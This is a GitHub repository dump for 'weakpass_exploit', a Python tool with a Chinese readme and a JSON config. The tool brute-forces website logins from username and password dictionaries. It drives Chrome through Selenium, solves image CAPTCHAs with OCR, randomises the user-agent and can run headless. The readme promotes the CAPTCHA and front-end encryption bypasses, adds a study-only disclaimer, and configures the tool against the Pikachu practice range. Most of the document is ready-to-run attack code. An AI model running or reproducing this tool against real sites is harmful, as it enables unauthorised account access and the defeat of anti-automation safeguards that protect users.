├── conf.json ├── images ├── regex_login_fail_res.png ├── regex_verify_res.png ├── use_eg.png └── xpath.png ├── readme.md └── weakpass_exploit.py /conf.json: -------------------------------------------------------------------------------- 1 | { 2 | "url": "http://192.168.86.186/pikachu-master/vul/burteforce/bf_server.php", 3 | "driver_path": "D:/python3/chromedriver.exe", 4 | "user_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[1]/span/input", 5 | "pass_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[2]/span/input", 6 | "orc_input_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[3]/span/input", 7 | "orc_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[4]/img", 8 | "login_button_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/div[2]/label/input", 9 | "regex_verify_res": "验证码输入错误哦", 10 | "regex_login_fail_res": "username or password is not exists" 11 | } 12 | -------------------------------------------------------------------------------- /images/regex_login_fail_res.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yxdnr/weakpass_exploit/ffc7f85135115035a77dd8dc354805eb3aab57e5/images/regex_login_fail_res.png -------------------------------------------------------------------------------- /images/regex_verify_res.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yxdnr/weakpass_exploit/ffc7f85135115035a77dd8dc354805eb3aab57e5/images/regex_verify_res.png -------------------------------------------------------------------------------- /images/use_eg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yxdnr/weakpass_exploit/ffc7f85135115035a77dd8dc354805eb3aab57e5/images/use_eg.png -------------------------------------------------------------------------------- /images/xpath.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yxdnr/weakpass_exploit/ffc7f85135115035a77dd8dc354805eb3aab57e5/images/xpath.png -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | # weakpass_exploit 2 | 3 | 网站弱口令爆破小脚本 4 | 5 | 优点: 6 | 7 | - 绕过图形验证码 8 | - 绕过前端数据加密 9 | 10 | 不足: 11 | 12 | - ddddocr识别不够精确 13 | - 单线程 14 | 15 | 注: 本项目所有文件仅供学习和研究使用,请勿使用项目中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 16 | 17 | ## 更新 18 | 2023-12-21 更新了说明文档,对配置文件的字段进行了说明 19 | 20 | 2023-2-27 更新了说明文档,修改了部分代码 21 | 22 | 2023-2-3 优化了登录判断逻辑,现在会根据登陆成功或失败后跳转的页面进行检索,匹配关键字判断是否登录成功 23 | 24 | ## 安装 25 | 26 | python 3.7+ 27 | 28 | ddddocr 29 | 30 | selenium 31 | 32 | [chromedriver.exe](https://chromedriver.chromium.org/downloads) 33 | 34 | ``` 35 | 通过这个链接查看支持的版本: 36 | https://chromedriver.storage.googleapis.com/LATEST_RELEASE 37 | 通过这个链接下载需要的版本: 38 | https://chromedriver.chromium.org/downloads 39 | ``` 40 | 41 | ## 配置 42 | 43 | 在conf.json中,参照以下内容进行配置,以pikachu靶场为例 44 | 45 | 复制页面元素的XPath填入到conf.json中 46 | 47 | ![image-20221212155504710](images/xpath.png) 48 | 49 | 验证码错误时会提示 50 | 51 | ![image-20230227152427063](images/regex_verify_res.png) 52 | 53 | 用户名密码错误时会提示 54 | 55 | ![image-20230227152609239](images/regex_login_fail_res.png) 56 | 57 | 配置文件字段含义 58 | 59 | ``` 60 | url:登陆页面的URL 61 | driver_path:本地chromedriver程序的路径 62 | user_xpath:用户名输入框的xpath路径 63 | pass_xpath:密码输入框的xpath路径 64 | orc_input_xpath:验证码输入框的xpath路径 65 | orc_xpath:验证码的xpath路径 66 | login_button_xpath:登陆按钮的xpath路径 67 | regex_verify_res:验证码识别失败的提示语 68 | regex_login_fail_res:验证码识别成功但是账户或者口令错误的提示语 69 | ``` 70 | 71 | 配置完成如下: 72 | 73 | ```json 74 | { 75 | "url": "http://192.168.86.186/pikachu-master/vul/burteforce/bf_server.php", 76 | "driver_path": "D:/python3/chromedriver.exe", 77 | "user_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[1]/span/input", 78 | "pass_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[2]/span/input", 79 | "orc_input_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[3]/span/input", 80 | "orc_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[4]/img", 81 | "login_button_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/div[2]/label/input", 82 | "regex_verify_res": "验证码输入错误哦", 83 | "regex_login_fail_res": "username or password is not exists" 84 | } 85 | ``` 86 | 87 | ## 使用 88 | 89 | 开始使用 90 | 91 | ``` 92 | Usage: usage weakpass_exploit.py -u -p -c 93 | 94 | Options: 95 | -h, --help show this help message and exit 96 | -u USERNAME_DICT Enter the username dict eg:user.txt 97 | -p PASSWORD_DICT Enter the password dict eg:pass.txt 98 | -c CONFIG_FILE Enter the config file eg:conf.json 99 | -e Use headless model eg: -e 100 | ``` 101 | 102 | ![image-20230227154440052](images/use_eg.png) 103 | -------------------------------------------------------------------------------- /weakpass_exploit.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import ddddocr 3 | from selenium import webdriver 4 | from selenium.webdriver.common.by import By 5 | from selenium.webdriver.chrome.service import Service 6 | from selenium.webdriver.chrome.options import Options 7 | from random import randint 8 | from colorama import init 9 | import optparse 10 | import time 11 | import json 12 | 13 | 14 | def login(driver, ocr, conf, username ,password): 15 | ######################## 16 | ##### 登录爆破功能 ##### 17 | ######################## 18 | 19 | driver.get(conf["url"]) 20 | orc_img = driver.find_element(By.XPATH, conf["orc_xpath"]) 21 | res = orc_identify(orc_img, ocr) 22 | regex_verify_res = conf["regex_verify_res"] 23 | regex_login_fail_res = conf["regex_login_fail_res"] 24 | driver.find_element(By.XPATH, conf["user_xpath"]).send_keys(username) 25 | driver.find_element(By.XPATH, conf["pass_xpath"]).send_keys(password) 26 | driver.find_element(By.XPATH, conf["orc_input_xpath"]).send_keys(res) 27 | driver.find_element(By.XPATH, conf["login_button_xpath"]).click() 28 | time.sleep(0.5) 29 | try: 30 | if alert_js(driver): 31 | html = alert_js(driver) 32 | driver.switch_to.alert.accept() 33 | else: 34 | html = driver.page_source 35 | if regex_verify_res in html: 36 | print("\033[0;31;40m[-]Verification code error : " + username + "/" + password + "\033[0m") 37 | elif regex_login_fail_res in html: 38 | print("\033[0;31;40m[-]login fail : " + username + "/" + password + "\033[0m") 39 | else: 40 | print("\033[1;32m[+]login success : " + username + "/" + password + "\033[0m") 41 | return 0 42 | except: 43 | print("\033[0;31;40m[-]Error!!! \033[0m") 44 | return 0 45 | 46 | 47 | def orc_identify(orc_img, ocr): 48 | #################### 49 | ##### ocr 识别 ##### 50 | #################### 51 | orc_img.screenshot('./image.png') 52 | with open('image.png', 'rb') as f: 53 | img_bytes = f.read() 54 | res = ocr.classification(img_bytes) 55 | return res 56 | 57 | 58 | def alert_js(driver): 59 | ######################## 60 | ##### 弹框文本处理 ##### 61 | ######################## 62 | try: 63 | alert = driver.switch_to.alert 64 | res = alert.text 65 | return res 66 | except: 67 | return False 68 | 69 | def browser(m): 70 | ######################## 71 | ##### 头浏览器设置 ##### 72 | ######################## 73 | s = Service("D:/python3/chromedriver.exe") 74 | chrome_ot = Options() 75 | if m: 76 | chrome_ot.add_argument("--headless") 77 | chrome_ot.add_argument("--incognito") 78 | chrome_ot.add_argument('--user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/{} Safari/{}"'.format(randint(100,900),randint(200,300))) 79 | chrome_ot.add_argument("--disable-infobars") 80 | chrome_ot.add_argument("--disable-gpu") 81 | chrome_ot.add_argument("--ignore-certificate-errors") 82 | chrome_ot.add_experimental_option('excludeSwitches', ['enable-logging','DeprecationWarning']) 83 | browser = webdriver.Chrome(service=s,options=chrome_ot) 84 | #browser.maximize_window() # 浏览器自动全屏 85 | browser.set_page_load_timeout(15) 86 | browser.implicitly_wait(15) 87 | return browser 88 | 89 | 90 | def file_read(file): 91 | #################### 92 | ##### 文件读取 ##### 93 | #################### 94 | f = open(file,"r") 95 | lists = f.readlines() 96 | f.close() 97 | return lists 98 | 99 | 100 | def run(user_list, pass_list, config_file, driver, ocr): 101 | #################### 102 | ##### 开始爆破 ##### 103 | #################### 104 | print("\033[7;36m[*]running...\033[0m") 105 | conf = json.load(open(config_file,'r',encoding='utf-8')) 106 | for user_line in user_list: 107 | user_line = user_line.strip("\n") 108 | for pass_line in pass_list: 109 | pass_line = pass_line.strip("\n") 110 | login(driver, ocr, conf, user_line , pass_line) 111 | print("\033[7;36m[*]all done!\033[0m") 112 | return 0 113 | 114 | def main(): 115 | #################### 116 | ##### 全局配置 ##### 117 | #################### 118 | init(autoreset=True) 119 | parser = optparse.OptionParser('usage %prog -u -p -c ') 120 | parser.add_option('-u' , dest = 'username_dict', action = 'store', type = 'string' , help = 'Enter the username dict eg:user.txt') 121 | parser.add_option('-p' , dest = 'password_dict', action = 'store', type = 'string' , help = 'Enter the password dict eg:pass.txt') 122 | parser.add_option('-c' , dest = 'config_file', action = 'store', type = 'string' , help = 'Enter the config file eg:conf.json') 123 | parser.add_option('-e' , dest = 'model_setting', action = 'store_true' , default = False, help = 'Use headless model eg: -e ') 124 | (options, args) = parser.parse_args() 125 | config_file = options.config_file 126 | username_dict = options.username_dict 127 | password_dict = options.password_dict 128 | model = options.model_setting 129 | driver = browser(model) 130 | ocr = ddddocr.DdddOcr() 131 | user_list = file_read(username_dict) 132 | pass_list = file_read(password_dict) 133 | run(user_list, pass_list, config_file, driver, ocr) 134 | time.sleep(1) 135 | driver.quit() 136 | 137 | 138 | if __name__ == "__main__": 139 | main() 140 | --------------------------------------------------------------------------------